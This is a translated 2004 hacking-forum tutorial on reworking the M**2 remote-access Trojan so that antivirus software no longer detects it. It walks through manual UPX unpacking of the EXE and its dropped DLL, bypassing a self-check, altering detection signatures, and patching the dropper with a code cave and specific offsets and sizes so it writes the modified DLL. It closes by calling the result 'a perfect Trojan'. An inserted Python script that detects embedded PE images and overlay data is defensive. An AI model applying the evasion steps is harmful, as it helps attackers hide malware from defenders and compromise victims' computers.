M**2 Trojan complete modification: unpacking, signature modification, PEDIY
Source: http://www.hackbase.com  Date: 2004-12-6 6:30:55  Author: tankaiha [NE365] [FCG]  Homepage: http://www.vxer.net
Disclaimer: This article is for technical research only. Because of the possible harm, it is written in very general terms, and the author provides no programs or code.
1. How the program runs
Generate the M**2 Trojan file with the M**2 builder. When run, the program copies itself into the WINDIR\System32 directory under a preset file name (assume aaa.exe) and deletes the original file. It then starts a new process, which extracts aaa.dll from data carried inside its own file, and at the same time modifies the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run. After that it enters its normal loop and installs its hook.
2. Modification target
Both aaa.exe and aaa.dll raise an alarm when scanned by anti-virus software. Our goal: completely escape anti-virus detection while the program keeps running normally.
3. Unpacking and self-check in the main file
PEiD identifies the main program (aaa.exe) as UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [overlay]. Unpack it manually at the POPAD and repair the import table with ImportREC (see fly's articles on unpacking).
00415218 FF96 E85E> CALL DWORD PTR DS:[ESI+15EE8]
0041521E 61        POPAD
0041521F - E9 A418FF> JMP AAA.00406AC8
After unpacking and repairing the import table, double-clicking the program does not run it normally. Tracing in OllyDbg shows the following jump:
00404F4B 53        PUSH EBX
00404F4C E8 9BF5FF> CALL
00404F51 85C0      TEST EAX, EAX
00404F53 75 07     JNZ SHORT Mir_Unpa.00404F5C
Before this instruction the program has called SetFilePointer to move to the end of the file, read the check data at the file tail, and tested it. Solution: append the tail data of the original, still-packed file to the end of the unpacked file; run the program again and it runs normally.
4. Unpacking the DLL file
Terminate the process and check aaa.dll in the System32 directory: it also shows UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [overlay]; refer to fly's article on unpacking DLLs. When unpacking manually in OllyDbg, the relocation table is located at 003C73FE with size BD2; repair it with UPXAngela, with the fixed file offset set to 11000, and modify the relocation table data in the unpacked file accordingly.
For the import table, trace from the program entry, follow an API call, and find the table starting at 003C20C8 with size 178 bytes; repair it with ImportREC.
The program entry point is changed to EFF4. At this point the unpacking of the DLL file is complete.
5. Locating and modifying the signature in the DLL file
Use a signature locator on the DLL file to locate the signature, then modify it with the usual signature-location and modification method.
6. PEDIY
This is the most critical step. Every time aaa.exe runs, it extracts aaa.dll from its own embedded data, ignoring the DLL we modified. We therefore have to embed our modified DLL inside aaa.exe so that, when aaa.exe runs, the DLL it writes out is our signature-free one.
Copy aaa.exe to the WINDIR\System32 directory, load and run it in OllyDbg with the breakpoint BP CreateFileA. When the file name parameter shows "WINDIR\System32\aaa.dll", trace manually and find the following location:
004063BA 50        PUSH EAX
004063BB E8 6CE0FF> CALL
004063C0 8BD8      MOV EBX, EAX
004063C2 6A 00     PUSH 0
004063C4 8D45 E0   LEA EAX, DWORD PTR SS:[EBP-20]
004063C7 50        PUSH EAX
004063C8 8B45 F8   MOV EAX, DWORD PTR SS:[EBP-8]   ; modification starts here
004063CB 50        PUSH EAX
004063CC 8B45 FC   MOV EAX, DWORD PTR SS:[EBP-4]
004063CF 50        PUSH EAX
004063D0 53        PUSH EBX
004063D1 E8 4EE1FF> CALL
004063D6 53        PUSH EBX
004063D7 E8 38E0FF> CALL
At the WriteFile call, note the number of bytes written: this is the size of the original DLL data inside the file. Close OllyDbg, open aaa.exe in UltraEdit, search for "MZ" to find the start of the original DLL data, and overwrite it with zeros, not exceeding the byte count just recorded.
Open the unpacked aaa.dll in UltraEdit, copy all of the DLL's data into the EXE file at file offset 00014798H (just before the self-check data), save and close. With PEinfo (by Crane) modify the last section of the EXE: add 1BBD2 (the number of bytes of the DLL) to RawSize, and set VirtualSize to the new RawSize rounded up to 1000h alignment; ImageSize is updated automatically. The signature-modified DLL is now placed inside the EXE. Next modify the instructions listed above (the WriteFile call, mainly the lpBuffer and nNumberOfBytesToWrite parameters) so that a normal aaa.dll is written when the program runs. The modification is as follows:
004063C8 / E9 D42E00> JMP AAA.004092A1
004063CD | 90        NOP
004063CE | 90        NOP
004063CF | 90        NOP
004063D0 | 90        NOP
004063D1 | E8 4EE1FF> CALL
004063D6 | 53        PUSH EBX
The code placed in the empty area (code cave) at 004092A1 is as follows:
004092A1 B8 D2AB01> MOV EAX, 1BBD2
004092A6 50        PUSH EAX
004092A7 B8 A06F41> MOV EAX, AAA.00416F98   ; ASCII "MZP"
004092AC 50        PUSH EAX
004092AD 53        PUSH EBX
004092AE ^ E9 24D1FF> JMP AAA.004063D1
00416F98 points to the start address of the new DLL data in the file. Save the modifications and run the program: it executes normally.
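The procedure above leaves two structural traces in aaa.exe that a file-format check can surface without any signature: a second MZ/PE header embedded inside a section (the DLL copied into the last section), and overlay data past the end of the last section (the self-check tail). The following inspector is an added example written for this page, not code from the original article or from any tool it names; it parses only the standard DOS header, file header and section table, and the executable it analyzes is constructed inside the script, so the section names and sizes are assumptions.

```python
import struct

FILE_ALIGN = 0x200
SECT_ALIGN = 0x1000


def _align(n, a):
    return (n + a - 1) // a * a


def parse_pe(data):
    """Return the section table of an in-memory PE as a list of dicts
    (name, vsize, vaddr, rawsize, rawptr). Raises ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                   # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr})
    return sections


def overlay_offset(data, sections):
    """File offset where overlay data would begin: end of the last section's raw data."""
    return max((s["rawptr"] + s["rawsize"] for s in sections), default=0)


def find_embedded_pe(data):
    """Offsets (other than 0) of MZ headers whose e_lfanew points at a valid PE signature."""
    hits = []
    pos = data.find(b"MZ", 1)
    while pos != -1:
        if pos + 0x40 <= len(data):
            lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            if lfanew < 0x1000 and data[pos + lfanew:pos + lfanew + 4] == b"PE\0\0":
                hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


def locate(off, sections, overlay_start):
    """Name the region of the file (section name, 'overlay' or 'headers') holding offset off."""
    if off >= overlay_start:
        return "overlay"
    for s in sections:
        if s["rawptr"] <= off < s["rawptr"] + s["rawsize"]:
            return s["name"]
    return "headers"


def analyze(data):
    """Report overlay size and any embedded PE images, with the byte length each image
    claims for itself (end of its own last section), which is what a carver would extract."""
    sections = parse_pe(data)
    end = overlay_offset(data, sections)
    embedded = []
    for off in find_embedded_pe(data):
        inner = data[off:]
        try:
            size = overlay_offset(inner, parse_pe(inner))
        except ValueError:
            size = None
        embedded.append({"offset": off, "where": locate(off, sections, end), "size": size})
    return {"sections": sections, "overlay_offset": end,
            "overlay_size": len(data) - end, "embedded": embedded}


def build_sample_pe(section_blobs, overlay=b""):
    """Constructed minimal PE32 image (sample input for the inspector, not a real binary):
    DOS header, file header, zeroed optional header, and one section per (name, bytes)."""
    e_lfanew, size_opt = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(section_blobs), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (size_opt - 2)
    headers_end = _align(e_lfanew + 24 + size_opt + 40 * len(section_blobs), FILE_ALIGN)
    table, body, rawptr, vaddr = b"", b"", headers_end, SECT_ALIGN
    for name, blob in section_blobs:
        rawsize, vsize = _align(len(blob), FILE_ALIGN), _align(len(blob), SECT_ALIGN)
        table += name.ljust(8, "\0").encode()[:8] + struct.pack(
            "<IIIIIIHHI", vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, 0x60000020)
        body += blob.ljust(rawsize, b"\0")
        rawptr, vaddr = rawptr + rawsize, vaddr + vsize
    return (dos + b"PE\0\0" + file_hdr + opt + table).ljust(headers_end, b"\0") + body + overlay


if __name__ == "__main__":
    # Constructed sample: an inner image sits inside the outer file's last section,
    # and a short tail follows the last section as overlay data.
    inner = build_sample_pe([(".text", b"\x90" * 100)])
    outer = build_sample_pe([(".text", b"\x90" * 300), (".data", b"\xCC" * 16 + inner)],
                            overlay=b"CHECK-DATA")
    report = analyze(outer)
    for s in report["sections"]:
        print(f"{s['name']:8} raw 0x{s['rawptr']:X}+0x{s['rawsize']:X} vsize 0x{s['vsize']:X}")
    print("overlay bytes:", report["overlay_size"])
    for e in report["embedded"]:
        print(f"embedded PE at 0x{e['offset']:X} in {e['where']}, {e['size']} bytes")
```

Run against a real file by replacing the constructed sample with the file's bytes; a main executable that carries a complete second PE image in its last section, plus overlay bytes, is exactly the shape the modification above produces.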
7. Signature modification of the main program
With this, the signature of the DLL inside aaa.exe no longer interferes (the DLL that carried the signature has been overwritten, and the newly embedded DLL has no signature); only the signature in the aaa.exe file itself remains, and it is modified in the same way. The process is omitted here. Once the modification is complete, OK, it has become a perfect Trojan.